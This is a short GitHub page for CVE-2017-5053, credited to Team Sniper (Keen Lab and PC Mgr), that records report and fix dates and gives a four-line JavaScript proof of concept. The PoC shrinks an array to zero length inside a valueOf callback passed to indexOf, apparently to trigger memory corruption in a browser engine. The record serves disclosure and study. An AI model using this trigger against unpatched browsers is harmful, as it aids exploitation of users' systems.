Skip to content

Latest commit

 

History

History
18 lines (13 loc) · 296 Bytes

CVE-2017-5053.md

File metadata and controls

18 lines (13 loc) · 296 Bytes

CVE-2017-5053

  • Report: Mar 2017
  • Fix: Mar 2017
  • Credit: Team Sniper (Keen Lab and PC Mgr)

PoC

arr=[];
for (var i = 0; i < 100000; i++)
    arr[i] = [];
arr.indexOf(new Object(), {valueOf:function(){arr.length = 0}})

Reference